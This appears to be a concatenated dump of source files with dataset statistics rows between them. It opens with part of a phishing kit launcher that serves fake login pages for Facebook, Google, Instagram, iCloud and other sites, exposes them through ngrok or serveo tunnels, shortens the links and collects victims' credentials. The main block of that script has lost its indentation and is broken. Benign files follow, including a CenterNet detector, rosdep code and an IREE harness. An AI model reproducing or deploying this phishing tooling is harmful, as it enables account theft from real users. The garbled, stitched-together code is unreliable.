    # `which php` exits non-zero (256 via os.system) when PHP is absent.
    if 256 != system('which php'): #Checking if user have PHP
        print (" --{0}>{1} OK.".format(CYAN, DEFAULT))
    else:
        print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(RED, DEFAULT))
        exit(0)
    # Hard gate: the user must accept the educational-use disclaimer.
    if input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes
        system('clear')
        print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, DEFAULT))
        exit(0)
    # Main site menu; each branch loads the module and installs its template.
    option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
    if option == '1':
        loadModule('Facebook')
        option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
        runPhishing('Facebook', option2)
    elif option == '2':
        loadModule('Google')
        option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
        runPhishing('Google', option2)
    elif option == '3':
        loadModule('LinkedIn')
        option2 = ''
        runPhishing('LinkedIn', option2)
    elif option == '4':
        loadModule('GitHub')
        option2 = ''
        runPhishing('GitHub', option2)
    elif option == '5':
        loadModule('StackOverflow')
        option2 = ''
        runPhishing('StackOverflow', option2)
    elif option == '6':
        loadModule('WordPress')
        option2 = ''
        runPhishing('WordPress', option2)
    elif option == '7':
        loadModule('Twitter')
        option2 = ''
        runPhishing('Twitter', option2)
    elif option == '8':
        loadModule('Instagram')
        option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
        runPhishing('Instagram', option2)
    elif option == '9':
        loadModule('Snapchat')
        option2 = ''
        runPhishing('Snapchat', option2)
    elif option == '10':
        loadModule('Yahoo')
        option2 = ''
        runPhishing('Yahoo', option2)
    elif option == '11':
        loadModule('Twitch')
        option2 = ''
        runPhishing('Twitch', option2)
    elif option == '12':
        loadModule('Microsoft')
        option2 = ''
        runPhishing('Microsoft', option2)
    elif option == '13':
        loadModule('Steam')
        option2 = ''
        runPhishing('Steam', option2)
    elif option == '14':
        loadModule('VK')
        option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
        runPhishing('VK', option2)
    elif option == '15':
        loadModule('iCloud')
        option2 = ''
        runPhishing('iCloud', option2)
    else:
        # Anything unrecognized exits quietly.
        exit(0)
def runServeo():
    """Expose the local server (port 1111) through serveo.net and print
    the public URL plus a TinyURL alias.

    The SSH reverse tunnel runs in the background and writes its output,
    which contains the public URL, to link.url.
    """
    system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
    sleep(7)  # give the tunnel time to come up and write link.url
    output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
    # Decode the bytes properly instead of the old str(output).strip("b ' \ n")
    # hack, which relied on stripping characters out of the repr of the bytes.
    url = output.decode().strip()
    print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
    link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
    print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
    print("\n")
def runNgrok():
    """Start an ngrok HTTP tunnel to port 1111, poll the local ngrok status
    page until the public https URL appears, then print it plus a TinyURL
    alias."""
    system('./Server/ngrok http 1111 > /dev/null &')
    while True:
        sleep(2)
        # Scrape the public URL from ngrok's local web interface.
        system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
        urlFile = open('ngrok.url', 'r')
        url = urlFile.read()
        urlFile.close()
        if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
            print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
            link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
            print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
            print("\n")
            break
def runServer():
    """Serve the phishing page from Server/www with PHP's built-in web
    server on 127.0.0.1:1111 (run as a background process)."""
    system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
def custom(): #Question where user can input custom web-link
print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT))
custom = input("\n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
if 'http://' or 'https://' in custom:
pass
else:
custom = 'http://' + custom
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
with open('Server/www/post.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/post.php', 'w')
f.write(c)
f.close()
else:
with open('Server/www/login.php') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/login.php', 'w')
f.write(c)
f.close()
custom()
def server(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(CYAN, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(CYAN, DEFAULT))
choice = input(" \n {0}SF-An0nUD4Y > {1}".format(CYAN, DEFAULT))
if choice == '1':
runNgrok()
elif choice == '2':
runServeo()
else:
system('clear')
return server()
server()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
end()
exit(0)
| 48.318653 | 607 | 0.520884 |
23f3a61f0a328519760a1d240086978a11ac3bf2 | 3,721 | py | Python | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | src/lib/detectors/ctdet_NFS.py | StudentWong/CenterNet | d20640d40db522b14813e21febff187bd4d75738 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
try:
from external.nms import soft_nms
except:
print('NMS not imported! If you need it,'
' do \n cd $CenterNet_ROOT/src/lib/external \n make')
from models.decode import ctdet_decode
from models.utils import flip_tensor
from utils.image import get_affine_transform
from utils.post_process import ctdet_post_process
from utils.debugger import Debugger
from .base_detector import BaseDetector
class CtdetDetector_NFS(BaseDetector):
  """CenterNet "ctdet" detector variant (NFS).

  Wraps a model whose last-stage output provides a center heatmap ('hm'),
  box sizes ('wh') and, when `opt.reg_offset` is set, sub-pixel center
  offsets ('reg'); decodes them into per-class bounding boxes.
  """

  def __init__(self, opt, train_eval=False, model=None):
    super(CtdetDetector_NFS, self).__init__(opt, train_eval, model)

  def process(self, images, return_time=False):
    """Run the network and decode its raw outputs into detections.

    Returns (output, dets), plus the post-forward timestamp when
    `return_time` is True.
    """
    with torch.no_grad():
      # The model returns a list of stage outputs; keep only the last stage.
      output = self.model(images)[-1]
      hm = output['hm']
      wh = output['wh']
      reg = output['reg'] if self.opt.reg_offset else None
      if self.opt.flip_test:
        # Test-time augmentation: batch holds [original, flipped]; average the
        # two predictions (offsets are not flip-averaged, only index 0 is kept).
        hm = (hm[0:1] + flip_tensor(hm[1:2])) / 2
        wh = (wh[0:1] + flip_tensor(wh[1:2])) / 2
        reg = reg[0:1] if reg is not None else None
      # Synchronize so `forward_time` measures the actual GPU forward pass.
      torch.cuda.synchronize()
      forward_time = time.time()
      dets = ctdet_decode(hm, wh, reg=reg, cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
    if return_time:
      return output, dets, forward_time
    else:
      return output, dets

  def post_process(self, dets, meta, scale=1):
    """Map decoded detections back to original-image coordinates per class."""
    dets = dets.detach().cpu().numpy()
    dets = dets.reshape(1, -1, dets.shape[2])
    dets = ctdet_post_process(
        dets.copy(), [meta['c']], [meta['s']],
        meta['out_height'], meta['out_width'], self.opt.num_classes)
    for j in range(1, self.num_classes + 1):
      # Each class maps to an (N, 5) array of [x1, y1, x2, y2, score].
      dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
      # Undo the test-scale augmentation on the box coordinates.
      dets[0][j][:, :4] /= scale
    return dets[0]

  def merge_outputs(self, detections):
    """Merge per-scale detections, optionally soft-NMS, cap at max_per_image."""
    results = {}
    for j in range(1, self.num_classes + 1):
      results[j] = np.concatenate(
          [detection[j] for detection in detections], axis=0).astype(np.float32)
      # Soft-NMS is only needed when combining multiple scales (or on request).
      if len(self.scales) > 1 or self.opt.nms:
        soft_nms(results[j], Nt=0.5, method=2)
    scores = np.hstack(
        [results[j][:, 4] for j in range(1, self.num_classes + 1)])
    if len(scores) > self.max_per_image:
      # Keep only the top `max_per_image` scores across all classes.
      kth = len(scores) - self.max_per_image
      thresh = np.partition(scores, kth)[kth]
      for j in range(1, self.num_classes + 1):
        keep_inds = (results[j][:, 4] >= thresh)
        results[j] = results[j][keep_inds]
    return results

  def debug(self, debugger, images, dets, output, scale=1):
    """Visualize the predicted heatmap and raw detections (first image only)."""
    detection = dets.detach().cpu().numpy().copy()
    # Detections are in output-feature-map coordinates; scale back to input.
    detection[:, :, :4] *= self.opt.down_ratio
    for i in range(1):
      img = images[i].detach().cpu().numpy().transpose(1, 2, 0)
      # Undo the input normalization for display.
      img = ((img * self.std + self.mean) * 255).astype(np.uint8)
      pred = debugger.gen_colormap(output['hm'][i].detach().cpu().numpy())
      debugger.add_blend_img(img, pred, 'pred_hm_{:.1f}'.format(scale))
      debugger.add_img(img, img_id='out_pred_{:.1f}'.format(scale))
      for k in range(len(dets[i])):
        if detection[i, k, 4] > self.opt.center_thresh:
          debugger.add_coco_bbox(detection[i, k, :4], detection[i, k, -1],
                                 detection[i, k, 4],
                                 img_id='out_pred_{:.1f}'.format(scale))

  def show_results(self, debugger, image, results):
    """Draw final, score-thresholded detections on `image` and display them."""
    debugger.add_img(image, img_id='ctdet')
    for j in range(1, self.num_classes + 1):
      for bbox in results[j]:
        if bbox[4] > self.opt.vis_thresh:
          debugger.add_coco_bbox(bbox[:4], j - 1, bbox[4], img_id='ctdet')
    debugger.show_all_imgs(pause=self.pause)
| 37.969388 | 90 | 0.637463 |
c6b03130a2b33ca4ebb6173a4523fbca0a107826 | 386 | py | Python | cieloApi3/request/reactivateRecorrency.py | naripok/API-3.0-Python | 3bdd27d321a03f4c761876f7907588a0f4726c70 | [
"MIT"
] | 37 | 2017-01-19T12:25:14.000Z | 2022-02-22T12:43:39.000Z | cieloApi3/request/reactivateRecorrency.py | math-s/API-3.0-Python | 8b493963f6dcc23cbe54221434f2fcfde3bccfdc | [
"MIT"
] | 5 | 2020-05-18T22:50:12.000Z | 2022-02-26T23:48:48.000Z | cieloApi3/request/reactivateRecorrency.py | math-s/API-3.0-Python | 8b493963f6dcc23cbe54221434f2fcfde3bccfdc | [
"MIT"
] | 46 | 2017-02-07T16:35:54.000Z | 2022-02-03T19:06:06.000Z |
from .base import Base
class ReactivateRecorrency(Base):
    """Request that reactivates a recurrent payment through the Cielo API."""

    def __init__(self, merchant, environment):
        """Keep the target environment and hand the merchant to the base request."""
        super(ReactivateRecorrency, self).__init__(merchant)
        self.environment = environment

    def execute(self, payment_id):
        """Issue the PUT call reactivating the recurrent payment `payment_id`."""
        endpoint = '%s1/RecurrentPayment/%s/Reactivate' % (
            self.environment.api_query, payment_id)
        return self.send_request("PUT", endpoint)
| 22.705882 | 93 | 0.699482 |
79c0fb2b59f3f25d690dabc6bf0de4c036efad72 | 1,506 | py | Python | generate-markdown.py | rakina/security-questionnaire | 9a18d70885ef028144708a1367ef763ab85f287e | [
"W3C-20150513",
"CC0-1.0"
] | 26 | 2015-05-21T15:24:43.000Z | 2022-03-09T21:27:10.000Z | generate-markdown.py | MaxMood96/security-questionnaire | c54ad08c20a102869c384b46a367ff7a9026556c | [
"W3C-20150513",
"CC0-1.0"
] | 99 | 2015-05-06T16:41:09.000Z | 2022-03-23T21:39:26.000Z | generate-markdown.py | MaxMood96/security-questionnaire | c54ad08c20a102869c384b46a367ff7a9026556c | [
"W3C-20150513",
"CC0-1.0"
] | 26 | 2015-06-12T18:07:54.000Z | 2021-10-14T21:58:45.000Z | #!/usr/bin/env python3
import sys
class MarkdownGenerator:
    """Extracts questionnaire questions from HTML and quotes them as Markdown."""

    def __init__(self):
        # State machine: are we inside an <h3 class=question> element, and is
        # the next content line the first line of that question?
        self.in_question = False
        self.first_line_in_question = False
        self.prefix = ""
        self.qnum = 0

    def process_line(self, line, outfile):
        """Feed one input line through the extractor state machine."""
        if self.in_question:
            if line.startswith("</h3>"):
                # Closing tag ends the current question; nothing is printed.
                self.in_question = False
                return
            stripped = line.lstrip()
            if self.first_line_in_question:
                # Number the question on its first content line.
                self.qnum += 1
                self.prefix = "> %02d. " % self.qnum
                self.first_line_in_question = False
            print(self.prefix, stripped, end='', file=outfile)
            # Continuation lines only carry the blockquote marker.
            self.prefix = "> "
        elif line.startswith("<h3 class=question id="):
            self.in_question = True
            self.first_line_in_question = True

    def generate_markdown(self, infile=sys.stdin, outfile=sys.stdout):
        """Emit the Markdown preamble, then translate every line of *infile*."""
        print("""# [Self-Review Questionnaire: Security and Privacy](https://w3ctag.github.io/security-questionnaire/)
This questionnaire has [moved](https://w3ctag.github.io/security-questionnaire/).
For your convenience, a copy of the questionnaire's questions is quoted here in Markdown, so you can easily include your answers in an [explainer](https://github.com/w3ctag/w3ctag.github.io/blob/master/explainers.md).
""", file=outfile)
        for line in infile:
            self.process_line(line, outfile)
if __name__ == '__main__':
    # Script entry point: read HTML on stdin, write Markdown to stdout.
    MarkdownGenerator().generate_markdown()
| 38.615385 | 217 | 0.622842 |
2e24e96acf89797685335185d8ea61db1cc2798c | 4,590 | py | Python | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | src/rosdep2/platforms/debian.py | NikolausDemmel/rosdep | 5897af419cbabc078659ef8a696f3538a868cb6e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author Tully Foote, Ken Conley
from rospkg.os_detect import OS_DEBIAN, OS_UBUNTU
from .pip import PIP_INSTALLER
from .gem import GEM_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller, TYPE_CODENAME
from ..shell_utils import read_stdout
# apt package manager key
APT_INSTALLER='apt'


def register_installers(context):
    # Make the apt installer implementation available under the APT_INSTALLER key.
    context.set_installer(APT_INSTALLER, AptInstaller())
def register_platforms(context):
    # Register both supported Debian-family platforms.
    register_debian(context)
    register_ubuntu(context)
def register_debian(context):
    # apt is the default installer on Debian; pip/gem/source are alternatives.
    context.add_os_installer_key(OS_DEBIAN, APT_INSTALLER)
    context.add_os_installer_key(OS_DEBIAN, PIP_INSTALLER)
    context.add_os_installer_key(OS_DEBIAN, GEM_INSTALLER)
    context.add_os_installer_key(OS_DEBIAN, SOURCE_INSTALLER)
    context.set_default_os_installer_key(OS_DEBIAN, APT_INSTALLER)
    # Debian releases are identified by codename, not version number.
    context.set_os_version_type(OS_DEBIAN, TYPE_CODENAME)
def register_ubuntu(context):
    # apt is the default installer on Ubuntu; pip/gem/source are alternatives.
    context.add_os_installer_key(OS_UBUNTU, APT_INSTALLER)
    context.add_os_installer_key(OS_UBUNTU, PIP_INSTALLER)
    context.add_os_installer_key(OS_UBUNTU, GEM_INSTALLER)
    context.add_os_installer_key(OS_UBUNTU, SOURCE_INSTALLER)
    context.set_default_os_installer_key(OS_UBUNTU, APT_INSTALLER)
    # Ubuntu releases are identified by codename (e.g. 'focal').
    context.set_os_version_type(OS_UBUNTU, TYPE_CODENAME)
def dpkg_detect(pkgs, exec_fn=None):
    """
    Given a list of package, return the list of installed packages.

    :param exec_fn: function to execute Popen and read stdout (for testing)
    """
    # Version-locking syntax (e.g. libeigen3-dev=3.0.1-*) is stripped before
    # querying dpkg; the query validates the package name only, not the
    # version. The map lets us return the caller's original spelling.
    version_lock_map = {}
    for pkg in pkgs:
        if '=' in pkg:
            version_lock_map[pkg.split('=')[0]] = pkg
        else:
            version_lock_map[pkg] = pkg
    query = ['dpkg-query', '-W', '-f=\'${Package} ${Status}\n\'']
    query.extend(version_lock_map.keys())
    if exec_fn is None:
        exec_fn = read_stdout
    output = exec_fn(query).replace('\'', '')
    installed = []
    for row in output.split('\n'):
        fields = row.split()
        # Installed rows look like: "<name> install ok installed".
        if len(fields) == 4 and fields[3] == 'installed':
            installed.append(fields[0])
    return [version_lock_map[name] for name in installed]
class AptInstaller(PackageManagerInstaller):
    """
    An implementation of the Installer for use on debian style
    systems.
    """

    def __init__(self):
        # Detection of already-installed packages is delegated to dpkg-query.
        super(AptInstaller, self).__init__(dpkg_detect)

    def get_install_command(self, resolved, interactive=True, reinstall=False):
        """Return one `sudo apt-get install` invocation per missing package."""
        to_install = self.get_packages_to_install(resolved, reinstall=reinstall)
        if not to_install:
            return []
        base_cmd = ['sudo', 'apt-get', 'install']
        if not interactive:
            # Non-interactive runs auto-confirm the installation.
            base_cmd.append('-y')
        return [base_cmd + [pkg] for pkg in to_install]
| 41.351351 | 79 | 0.725926 |
9b05a39fc34056208b77b81b09573c56b52738b7 | 3,184 | py | Python | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 7 | 2020-06-06T00:01:04.000Z | 2022-01-13T01:47:17.000Z | mayan/apps/appearance/classes.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.template.loader import get_template
class IconDriver(object):
    """Registry base class mapping a driver name to its driver class."""

    # Shared name -> driver-class mapping, populated via register().
    _registry = {}

    @classmethod
    def register(cls, driver_class):
        """Record *driver_class* under its declared ``name`` attribute."""
        cls._registry[driver_class.name] = driver_class

    @classmethod
    def get(cls, name):
        """Return the driver class registered as *name* (KeyError if absent)."""
        return cls._registry[name]
class FontAwesomeDriver(IconDriver):
    """Render a single Font Awesome symbol through its template."""
    name = 'fontawesome'
    template_name = 'appearance/icons/font_awesome_symbol.html'

    def __init__(self, symbol):
        self.symbol = symbol

    def render(self):
        template = get_template(template_name=self.template_name)
        return template.render(context={'symbol': self.symbol})
class FontAwesomeDualDriver(IconDriver):
    """Render a masked primary symbol with a shrunken secondary symbol on top."""
    name = 'fontawesome-dual'
    template_name = 'appearance/icons/font_awesome_layers.html'

    def __init__(self, primary_symbol, secondary_symbol):
        self.primary_symbol = primary_symbol
        self.secondary_symbol = secondary_symbol

    def render(self):
        # Layer stack consumed by the font_awesome_layers template.
        layers = (
            {
                'class': 'fas fa-circle',
                'transform': 'down-3 right-10',
                'mask': 'fas fa-{}'.format(self.primary_symbol)
            },
            {'class': 'far fa-circle', 'transform': 'down-3 right-10'},
            {
                'class': 'fas fa-{}'.format(self.secondary_symbol),
                'transform': 'shrink-4 down-3 right-10'
            },
        )
        return get_template(template_name=self.template_name).render(
            context={'data': layers}
        )
class FontAwesomeCSSDriver(IconDriver):
    """Render an icon specified directly as CSS classes."""
    name = 'fontawesomecss'
    template_name = 'appearance/icons/font_awesome_css.html'

    def __init__(self, css_classes):
        self.css_classes = css_classes

    def render(self):
        template = get_template(template_name=self.template_name)
        return template.render(context={'css_classes': self.css_classes})
class FontAwesomeMasksDriver(IconDriver):
    """Render an icon described by caller-supplied mask layer data."""
    name = 'fontawesome-masks'
    template_name = 'appearance/icons/font_awesome_masks.html'

    def __init__(self, data):
        self.data = data

    def render(self):
        template = get_template(template_name=self.template_name)
        return template.render(context={'data': self.data})
class FontAwesomeLayersDriver(IconDriver):
    """Render an icon described by caller-supplied layer data."""
    name = 'fontawesome-layers'
    template_name = 'appearance/icons/font_awesome_layers.html'

    def __init__(self, data):
        self.data = data

    def render(self):
        template = get_template(template_name=self.template_name)
        return template.render(context={'data': self.data})
class Icon(object):
    """Facade that instantiates the named driver and delegates rendering to it."""

    def __init__(self, driver_name, **kwargs):
        self.kwargs = kwargs
        driver_class = IconDriver.get(name=driver_name)
        self.driver = driver_class(**kwargs)

    def render(self, **kwargs):
        return self.driver.render(**kwargs)
# Register all bundled driver implementations so Icon(driver_name=...) can
# resolve them by name at import time.
IconDriver.register(driver_class=FontAwesomeCSSDriver)
IconDriver.register(driver_class=FontAwesomeDriver)
IconDriver.register(driver_class=FontAwesomeDualDriver)
IconDriver.register(driver_class=FontAwesomeLayersDriver)
IconDriver.register(driver_class=FontAwesomeMasksDriver)
7a682bcde0c7840d533e59365e7382cf6c41bfcb | 28,144 | py | Python | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | 1 | 2022-03-11T20:12:50.000Z | 2022-03-11T20:12:50.000Z | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | null | null | null | python/examples/core/harness.py | 00mjk/iree-llvm-sandbox | f076d9668d38ff8374c97650992a8027afa3f38e | [
"Apache-2.0"
] | 1 | 2022-03-11T20:12:51.000Z | 2022-03-11T20:12:51.000Z | # Make dict a generic (type-subscriptable) type for Python <3.9.
from __future__ import annotations
import argparse
import re
import sys
import os
import time
from collections import defaultdict
from typing import AbstractSet, Any, Callable, List, Mapping, Optional, Sequence, Union
import numpy
import pandas
from mlir.execution_engine import *
from mlir.ir import *
from mlir.runtime import *
from mlir.iree_sandbox import register_sandbox_passes_and_dialects
from mlir.dialects.builtin import ModuleOp
import mlir.dialects.linalg_transform as tx
from ..core.compilation import compile_to_execution_engine, \
emit_benchmarking_function, mlir_type
from ..core.experts import TransformationList
from ..core.problem_definition import *
from ..core.transforms import ApplySchedule
from ..core.utils import *
# Log everything to stderr and flush so that we have a unified stream to match
# errors/info emitted by MLIR to stderr.
def log(*args):
  """Print *args* to stderr, flushing immediately so output interleaves
  correctly with diagnostics MLIR emits on the same stream."""
  print(*args, file=sys.stderr, flush=True)
# AVX512 throttling needs a lot of iteration, chance to only report the last n
# after throttling has had a good chance of happening.
def keep_last_n_if_specified(timing_results: List):
  """Optionally keep only the last N entries of `timing_results`.

  N is read from the SANDBOX_KEEP_LAST_N_RUNS environment variable; when it
  is unset the list is returned unchanged. AVX512 throttling needs many
  iterations, so reporting only the tail gives throttling a chance to settle.
  """
  requested = os.environ.get('SANDBOX_KEEP_LAST_N_RUNS')
  if requested is None:
    return timing_results
  n_to_keep = min(int(requested), len(timing_results))
  return timing_results[-n_to_keep:]
# Metric name -> per-iteration measurement values.
TimingResults = Mapping[str, Sequence[float]]
# Problem sizes: ints, possibly with nested integer lists (e.g. tile sizes).
ProblemSizes = Sequence[Union[int, Sequence[int]]]
class Measurements:
  """Class storing measurement configuration and results in data frame.

  Each `append` call adds one row per timing sample, replicating the
  benchmark-configuration columns across the sample rows.
  """

  # Columns identifying one benchmark configuration.
  config_keys = [ \
      "function_name",
      "expert",
      "np_types",
      "dynamic_at_compile_time",
      "runtime_problem_sizes_dict",
      "total_gflops",
      "total_gbytes",
  ]
  # Columns holding per-iteration measurement values.
  data_keys = [ \
      "elapsed_s_per_iter",
      "gbyte_per_s_per_iter",
      "gflop_per_s_per_iter",
  ]

  def __init__(self):
    # Empty frame with the full column schema in place.
    self.data = pandas.DataFrame(
        dict([(col, []) for col in self.config_keys + self.data_keys]))

  def append(self, function_name: str, expert_name: str,
             np_types: Sequence[np.dtype],
             dynamic_at_compile_time_sizes: AbstractSet[str],
             runtime_problem_sizes_dict: Mapping[str, ProblemSizes],
             gflops: int, gbytes: int, timing_results_dict: TimingResults):
    """Append measurement results."""
    config = pandas.DataFrame(
        dict(
            zip(self.config_keys,
                [[function_name], [expert_name],
                 [self._stringify_types(np_types)],
                 [self._stringify_set(dynamic_at_compile_time_sizes)],
                 [self._stringify_dict(runtime_problem_sizes_dict)], [gflops],
                 [gbytes]])))
    results = pandas.DataFrame(
        dict([(k, timing_results_dict[k]) for k in self.data_keys]))
    # Cross-product: add an identical fake key to both data frames,
    # merge on that key, and delete it.
    config['_fake_key'] = 1
    results['_fake_key'] = 1
    product = config.merge(results, on='_fake_key') \
                    .drop(labels='_fake_key', axis=1)
    # DataFrame.append was deprecated in pandas 1.4 and removed in 2.0;
    # pandas.concat is the supported replacement.
    self.data = pandas.concat([self.data, product])

  def to_dict(self) -> dict[str, Any]:
    """Return a dictionary containing the aggregated data."""
    return self.data.to_dict()

  def to_data_frame(self) -> pandas.DataFrame:
    """Return a data frame containing the aggregated data."""
    return self.data

  def dump_to_file(self, file_name: str):
    """Dump the measurements to a json file, merging with any existing file."""
    # Load existing data.
    if os.path.exists(file_name):
      existing_data = pandas.read_json(file_name)
      # DataFrame.append was removed in pandas 2.0; use pandas.concat.
      self.data = pandas.concat([existing_data, self.data])
    # Create the path if needed.
    directory = os.path.dirname(file_name)
    if not os.path.exists(directory):
      os.makedirs(directory)
